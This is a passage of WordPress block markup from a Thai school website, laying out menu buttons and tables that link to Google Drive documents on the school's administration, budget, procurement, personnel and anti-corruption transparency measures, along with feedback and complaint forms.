900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong><br> <a href=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\">    - คู่มือฝ่ายบริหารงานงบประมาณ</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\"> - คู่มือฝ่ายบริหารงานวิชาการ</a><br><a href=\"https://drive.google.com/file/d/1d2db3xyqZbucO821fPXAU0frbQC9W5KA/view?usp=drive_link\" target=\"_blank\" rel=\"noreferrer noopener\"> - คู่มือฝ่ายบริหารงานบุคคล</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\">  </a><a href=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\">- คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1woP9ChkM3zQI8gthAIPX43-z4ymQZZLk/view?usp=drive_link\" data-type=\"page\" data-id=\"2\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1JpT_5pzV7hlbP1epiDCWYSAQG-UOkUeD/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1JpT_5pzV7hlbP1epiDCWYSAQG-UOkUeD/view?usp=drive_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1YhuyYvmrvtvgv6jkYfYHMulIorbiuLIA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1Nf4XWZmTyc4NdsmEJfShsVdo2WXGwzgr/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1fYwZNgW-VtyshJmctqYo_ZKlKE-M6JS1/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1fYwZNgW-VtyshJmctqYo_ZKlKE-M6JS1/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/15xtXTS0J1eFadldJs36XtPWecBT7tkDc/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\">ป</a><a href=\"http://watprato.ssk.in.th/?page_id=2\" data-type=\"page\" data-id=\"2\">ระกาศเจตนารมณ์นโยบาย No G</a><a href=\"https://drive.google.com/file/d/15xtXTS0J1eFadldJs36XtPWecBT7tkDc/view?usp=drive_link\" data-type=\"page\" data-id=\"2\">ift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_ecdd7d-71\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\